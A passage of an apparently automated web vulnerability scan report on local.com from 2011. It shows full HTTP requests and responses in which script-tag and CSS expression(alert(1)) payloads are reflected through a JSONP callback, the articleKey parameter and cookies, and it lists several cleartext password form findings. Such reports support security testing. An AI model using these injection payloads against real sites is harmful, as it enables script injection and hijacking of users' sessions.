GET /ver1.0/Direct/Jsonp?r=%7B%22Requests%22%3A%5B%7B%22UpdateArticleAction%22%3A%7B%22Categories%22%3A%5B%5D%2C%22OnPageTitle%22%3A%22Hillcrest%20Bank%20%2528Dallas%252C%20TX%2529%22%2C%22OnPageUrl%22%3A%22104826937%7CHillcrest%20Bank%7CDallas%252C%20TX%22%2C%22Section%22%3A%7B%22Section%22%3A%7B%22Name%22%3A%22Dallas%2C%20TX%22%7D%7D%2C%22UpdateArticle%22%3A%7B%22ArticleKey%22%3A%7B%22Key%22%3A%22104826937%22%7D%7D%7D%7D%5D%2C%22UniqueId%22%3A0%7D&cb=RequestBatch.callbacks.daapiCallback08cbb2<script>alert(1)</script>2eab8d1e87a&pcksl=http%3A%2F%2Fwww.local.com&pckdt=local.com HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.8.10.1296748820; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; ym_pop_freq1421534=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITELCL02proddmlocal
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript; charset=utf-8
Date: Thu, 03 Feb 2011 16:06:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SiteLifeHost=SJL01WSITELCL02proddmlocal; domain=local.com; path=/
Set-Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=663488778.20480.0000; path=/ ; domain=local.com; path=/
Content-Length: 188

RequestBatch.callbacks.daapiCallback08cbb2<script>alert(1)</script>2eab8d1e87a({"ResponseBatch":{"Messages":[{"Message":"ok","MessageTime":"02/03/2011 08:06:04:885 AM"}],"Responses":[]}});

2.27. http://www.local.com/ver1.0/ReviewPage.app [articleKey parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /ver1.0/ReviewPage.app

Issue detail

The value of the articleKey request parameter is copied into the HTML document as plain text between tags. The payload 76469<script>alert(1)</script>5cd27d00a02 was submitted in the articleKey parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/ReviewPage.app?onPage=1&reviewsPerPage=10&articleKey=10482693776469<script>alert(1)</script>5cd27d00a02&pcksl=http%3A%2F%2Fwww.local.com&pckdt=local.com&rand=1296748922751 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.8.10.1296748820; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; ym_pop_freq1421534=1; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITELCL01proddmlocal
Vary: Content-Encoding
Cache-Control: private
Content-Type: application/json
Date: Thu, 03 Feb 2011 16:06:56 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SiteLifeHost=SJL01WSITELCL01proddmlocal; domain=local.com; path=/
Set-Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; path=/ ; domain=local.com; path=/
Content-Length: 657

{
"ReviewsPage": {
"SortType": {
"SortOrder": "Descending",
"ObjectType": "Models.System.Sorting.TimestampSort"
},
"AverageReviewRating": 0.0,
"TotalItems": 0,
"ReviewOnKey": {
"Key": "10482693776469<script>alert(1)</script>5cd27d00a02",
"ObjectType": "Models.External.ExternalResourceKey"
},
"ItemsPerPage": 10,
"ObjectType": "Responses.Reactions.ReviewsPageResponse",
"Items": [],
"OneBasedOnPage": 1,
...[SNIP]...

3. Cleartext submission of password  previous  next
There are 31 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


3.1. http://www.local.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 28061
Date: Thu, 03 Feb 2011 16:50:12 GMT
Content-Length: 28061
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:12 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX - Search for local
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

3.2. http://www.local.com/business/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /business/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 77820
Date: Thu, 03 Feb 2011 16:38:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:38:55 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Business+Home|home|%2fbusiness%2f~Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 77820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX - Search for local
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

3.3. http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/dallas-tx/amegy-bank-97648000/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /business/details/dallas-tx/amegy-bank-97648000/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186476435569; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 116008
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:01 GMT
Connection: close
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=local.com; expires=Thu, 03-Feb-2011 16:31:01 GMT; path=/
Content-Length: 116008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Amegy Bank in Dallas, TX - (
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

3.4. http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/dallas-tx/cet-products-liquidators-9985416/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /business/details/dallas-tx/cet-products-liquidators-9985416/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 91928
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:00:47 GMT
Connection: close
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Cet+Products+%26+Liquidators|Dallas%2c+TX|Appraisal+And+Liquidation+Services|11134700|9985416; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186474914335; domain=local.com; expires=Thu, 03-Feb-2011 16:30:47 GMT; path=/
Content-Length: 91928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Cet Products & Liquidators in
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

3.5. http://www.local.com/business/details/dallas-tx/equity-bank-63975058/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/dallas-tx/equity-bank-63975058/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /business/details/dallas-tx/equity-bank-63975058/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 115967
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:00:47 GMT
Connection: close
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186476435569; domain=local.com; expires=Thu, 03-Feb-2011 16:30:47 GMT; path=/
Content-Length: 115967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Equity Bank in Dallas, TX -
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

3.6. http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/dallas-tx/hillcrest-bank-104826937/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /business/details/dallas-tx/hillcrest-bank-104826937/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186476435569; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 116644
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:00 GMT
Connection: close
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Hillcrest+Bank|Dallas%2c+TX|Retail+Banks|15020100|104826937~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186602212783; domain=local.com; expires=Thu, 03-Feb-2011 16:31:00 GMT; path=/
Content-Length: 116644

